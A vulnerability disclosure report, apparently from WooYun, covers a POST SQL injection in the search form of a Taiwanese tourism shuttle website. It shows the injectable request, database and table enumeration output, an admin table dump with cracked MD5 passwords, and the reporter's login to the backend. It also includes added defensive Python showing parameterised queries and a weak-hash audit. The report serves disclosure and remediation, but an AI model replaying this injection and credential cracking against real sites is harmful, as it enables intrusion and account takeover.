WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-09: Details reported to the vendor, awaiting vendor handling
2015-12-14: Vendor has confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and experts in the relevant field
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-25: Details disclosed to the public
The site belongs to the Tourism Bureau of the Ministry of Transportation, Taiwan, and carries a Google green mark.
POST SQL injection in the search function on the homepage of the Taiwan Tourist Shuttle (台灣好行) official website.
http://**.**.**.**/Search/Do/
POST request:
POST /Search/Do/ HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Main/Lang/?redirect=/Main/Index/&lang=zh-tw
Cookie: PHPSESSID=tp835upbb4qopb5gqo13q3bsu5; __utma=118975756.14135579.1449631688.1449631688.1449631688.1; __utmb=118975**.**.**.**9631688; __utmc=118975756; __utmz=118975756.1449631688.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

search_word=1
[11:32:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0
[11:32:52] [INFO] fetching current user
[11:32:53] [INFO] retrieved: TBROC26@localhost
current user: 'TBROC26@localhost'
dbs
available databases [2]:
[*] information_schema
[*] TBROC26

Database: TBROC26
[57 tables]
+-------------------------+
| besttour_busstops       |
| file                    |
| tt_acl_ctrl             |
| tt_admin_group          |
| tt_admin_group_acl      |
| tt_admin_menu           |
| tt_admin_menu_group     |
| tt_admin_menu_group2    |
| tt_admin_response       |
| tt_admin_user           |
| tt_admin_user_old       |
| tt_banner               |
| tt_besttour             |
| tt_besttour_busstops    |
| tt_besttour_bustimes    |
| tt_besttour_direction   |
| tt_besttour_scene       |
| tt_besttour_service     |
| tt_besttour_service2    |
| tt_besttour_time        |
| tt_besttour_time_link   |
| tt_besttour_traffic     |
| tt_controller_action    |
| tt_event_register       |
| tt_file                 |
| tt_group                |
| tt_group_acl            |
| tt_guestbook            |
| tt_i18n                 |
| tt_i18n_data            |
| tt_key_word             |
| tt_lang                 |
| tt_link                 |
| tt_lottery              |
| tt_news                 |
| tt_o_admin_menu         |
| tt_o_admin_user         |
| tt_o_file               |
| tt_playtour             |
| tt_playtour_scene       |
| tt_qa                   |
| tt_qa_cate              |
| tt_scene                |
| tt_setting              |
| tt_station              |
| tt_station_map          |
| tt_station_time         |
| tt_system               |
| tt_taiwantrip_set       |
| tt_ticket_link          |
| tt_time_link            |
| tt_tour_date_type       |
| tt_tour_time            |
| tt_train_xml            |
| tt_weather              |
| tt_weather_week         |
| zdrop_besttour_busstops |
+-------------------------+
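The defect behind the request above is a search term that reaches the database as part of the SQL text. The following is an added editor's example, not code from the site (which, per the session cookie and server banner, runs PHP on Apache with MySQL): it reproduces the vulnerable pattern and the parameterised fix in Python against an in-memory SQLite table so the contrast can be run offline. The table name tt_besttour appears in the enumeration above; its columns, the sample rows and the probe string are constructed assumptions.

```python
"""Vulnerable vs. hardened handling of a search term (constructed example).

The reported site is PHP/MySQL; this reproduces the same defect and fix
in Python with SQLite. Columns and rows below are constructed.
"""
import sqlite3

# Constructed sample rows; the real table's columns are not known here.
SAMPLE_ROUTES = [
    (1, "Sun Moon Lake Route"),
    (2, "Alishan Route"),
    (3, "Taroko Route"),
]


def make_db():
    """Build an in-memory table shaped like a route list."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tt_besttour (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO tt_besttour VALUES (?, ?)", SAMPLE_ROUTES)
    return conn


def escape_like(s, esc="\\"):
    """Escape LIKE metacharacters so user input cannot widen the match."""
    return s.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def search_vulnerable(conn, search_word):
    """The defective pattern: the user value is spliced into the SQL text.

    A quote inside search_word terminates the string literal and whatever
    follows is parsed as SQL, which is what the report exploited.
    """
    sql = "SELECT id, name FROM tt_besttour WHERE name LIKE '%" + search_word + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, search_word):
    """The fix: the value travels as a bound parameter.

    The driver sends it as data, so it can only ever be compared, never
    parsed. LIKE wildcards are escaped as well, with a matching ESCAPE
    clause, so '%' or '_' in the input match literally.
    """
    pattern = "%" + escape_like(search_word) + "%"
    sql = "SELECT id, name FROM tt_besttour WHERE name LIKE ? ESCAPE '\\'"
    return conn.execute(sql, (pattern,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "' OR 1=1 -- "          # constructed probe: a quote plus trailing comment
    print("vulnerable:", search_vulnerable(db, probe))   # every row comes back
    print("safe:      ", search_safe(db, probe))         # nothing matches
```

The same probe returns the whole table through `search_vulnerable` and an empty result through `search_safe`; the only difference between the two functions is whether the user value is part of the statement or a parameter bound to it. In the site's own stack the equivalent is a prepared statement (PDO or mysqli) instead of string concatenation.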
This involves phone numbers, e-mail addresses, usernames, passwords, login IPs, and so on.
+---------------+---------------------+
| Column        | Type                |
+---------------+---------------------+
| account       | varchar(16)         |
| admin_user_id | int(10) unsigned    |
| avatar        | int(11) unsigned    |
| besttour_id   | varchar(255)        |
| create_time   | timestamp           |
| disabled      | enum('T','F')       |
| email         | varchar(32)         |
| group_id      | tinyint(3) unsigned |
| last_login    | datetime            |
| modify_time   | datetime            |
| name          | varchar(16)         |
| password      | varchar(32)         |
| removed       | enum('T','F')       |
| sid           | varchar(32)         |
| super         | enum('T','F')       |
| user_agent    | varchar(255)        |
| user_ip       | varchar(15)         |
+---------------+---------------------+
Accounts and passwords; most of the hashes were cracked.
+---------+---------------+--------+-------------+---------------------+----------+--------------------------+----------+---------------------+---------------------+--------+-------------------------------------------+---------+---------+-------+------------+---------+
| account | admin_user_id | avatar | besttour_id | create_time         | disabled | email                    | group_id | last_login          | modify_time         | name   | password                                  | removed | sid     | super | user_agent | user_ip |
+---------+---------------+--------+-------------+---------------------+----------+--------------------------+----------+---------------------+---------------------+--------+-------------------------------------------+---------+---------+-------+------------+---------+
| admin   | 1             | 0      | NULL        | 2010-07-28 14:37:45 | F        | admin@**.**.**.**        | 1        | 2010-08-02 16:03:18 | 2010-07-28 23:04:46 | ?????  | 827ccb0eea8a706c4c34a16891f84e7b (12345)  | F       | <blank> | T     | <blank>    | <blank> |
| tirme   | 2             | 0      | NULL        | 2010-07-28 23:06:14 | F        | tirme@**.**.**.**        | 1        | 2010-07-28 23:12:01 | 2010-07-29 02:56:17 | ???    | d41d8cd98f00b204e9800998ecf8427e          | F       | <blank> | F     | <blank>    | <blank> |
| winny   | 3             | 0      | NULL        | 2010-08-14 21:47:31 | F        | winny@**.**.**.**        | 1        | 0000-00-00 00:00:00 | 2010-08-14 21:47:31 | winny  | 4297f44b13955235245b2497399d7a93 (123123) | F       | <blank> | F     | <blank>    | <blank> |
| tbroc   | 5             | 0      | NULL        | 2010-09-07 23:17:51 | F        | b213999@**.**.**.**      | 4        | 0000-00-00 00:00:00 | 2010-09-07 23:17:51 | tbroc  | 0221d64d9a8accf56122e74cb36940b6          | F       | <blank> | F     | <blank>    | <blank> |
| jeremy  | 6             | 0      | NULL        | 2010-09-28 12:18:37 | F        | arkly365@**.**.**.**     | 1        | 0000-00-00 00:00:00 | 2011-07-01 11:20:50 | jeremy | 827ccb0eea8a706c4c34a16891f84e7b (12345)  | F       | <blank> | F     | <blank>    | <blank> |
| clair   | 7             | 0      | NULL        | 2011-06-21 11:52:40 | F        | clair@**.**.**.**        | 1        | 0000-00-00 00:00:00 | 2011-06-21 11:52:40 | clair  | e10adc3949ba59abbe56e057f20f883e (123456) | F       | <blank> | F     | <blank>    | <blank> |
| yoyo    | 8             | 0      | NULL        | 2011-07-04 14:47:40 | F        | yoyo@**.**.**.**         | 1        | 0000-00-00 00:00:00 | 2011-07-04 14:47:40 | yoyo   | e10adc3949ba59abbe56e057f20f883e (123456) | F       | <blank> | F     | <blank>    | <blank> |
| yumin   | 9             | 0      | NULL        | 2011-07-20 10:41:32 | F        | yumin@**.**.**.**        | 5        | 0000-00-00 00:00:00 | 2011-07-20 10:41:32 | yumin  | e10adc3949ba59abbe56e057f20f883e (123456) | F       | <blank> | F     | <blank>    | <blank> |
+---------+---------------+--------+-------------+---------------------+----------+--------------------------+----------+---------------------+---------------------+--------+-------------------------------------------+---------+---------+-------+------------+---------+
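The dump shows a `password` column of bare 32-character hex digests (a varchar(32), so unsalted MD5), the same digest reused across accounts, and several digests the reporter resolved to short numeric strings; the value d41d8cd98f00b204e9800998ecf8427e in the tirme row is the MD5 of the empty string. The following is an added editor's audit, not the site's code: given rows in the shape of tt_admin_user, it flags unsalted MD5 digests, digests shared between accounts, and digests matching a small constructed list of weak candidates, so an operator can find such accounts before a report like this one does. The rows, the candidate list and the bcrypt-style placeholder are all constructed.

```python
"""Audit an admin-user table for unsalted, weak or shared MD5 digests.

Constructed example in the shape of the report's tt_admin_user table;
no real site data is used.
"""
import hashlib
import re
from collections import defaultdict

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def md5_hex(s):
    """Unsalted MD5, as the audited column stores it. Used only to build the
    weak-candidate lookup and the constructed sample rows."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


# Constructed: a deliberately tiny candidate list. A real audit would use the
# organisation's banned-password list plus a large public wordlist.
WEAK_CANDIDATES = ["", "12345", "123456", "123123", "password"]

# Constructed rows: (account, stored password value, super flag).
SAMPLE_ROWS = [
    ("admin",  md5_hex("12345"), "T"),
    ("tirme",  md5_hex(""), "F"),
    ("winny",  md5_hex("123123"), "F"),
    ("jeremy", md5_hex("12345"), "F"),
    ("clair",  md5_hex("123456"), "F"),
    ("strong", md5_hex("kX9#vL2mQp!7wz"), "F"),        # unsalted, but not a weak candidate
    ("modern", "$2y$10$PLACEHOLDER-bcrypt-hash", "F"),  # constructed non-MD5 placeholder
]


def audit_admin_users(rows, candidates=WEAK_CANDIDATES):
    """Return {account: [finding, ...]} for accounts that need attention.

    Findings:
      unsalted-md5   stored value is a bare 32-hex MD5 digest
      weak-password  digest equals the MD5 of a candidate (value not reported)
      superuser      a flagged account also has super='T'
      shared-with:X  account X stores the identical digest (same password)
    """
    weak_lookup = {md5_hex(c) for c in candidates}
    by_digest = defaultdict(list)
    findings = {}
    for account, stored, is_super in rows:
        issues = []
        if MD5_HEX.match(stored):
            issues.append("unsalted-md5")
            by_digest[stored].append(account)
            if stored in weak_lookup:
                issues.append("weak-password")
        if issues and is_super == "T":
            issues.append("superuser")
        if issues:
            findings[account] = issues
    # Identical unsalted digests mean identical passwords: one compromise
    # unlocks every account in the group.
    for digest, accounts in by_digest.items():
        if len(accounts) > 1:
            for a in accounts:
                others = ",".join(x for x in accounts if x != a)
                findings[a].append("shared-with:" + others)
    return findings


if __name__ == "__main__":
    for account, issues in audit_admin_users(SAMPLE_ROWS).items():
        print(f"{account:8s} {', '.join(issues)}")
```

The audit reports the category of problem, never the recovered password, which is all an operator needs to force a reset. The lasting fix is to stop storing MD5 at all and move to a salted, slow hash (bcrypt, scrypt or Argon2, which PHP exposes through password_hash and password_verify), re-hashing each account at its next successful login.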
A scan turned up no admin panel; later I tried /admin/ and the backend login page appeared on its own.
With a password obtained through the injection, I logged into the backend. It allows managing guestbook entries and, more seriously, managing all routes and all itinerary assignments.
Severity: High
Vulnerability Rank: 17
Confirmed: 2015-12-14 03:53
Thanks for the report
None yet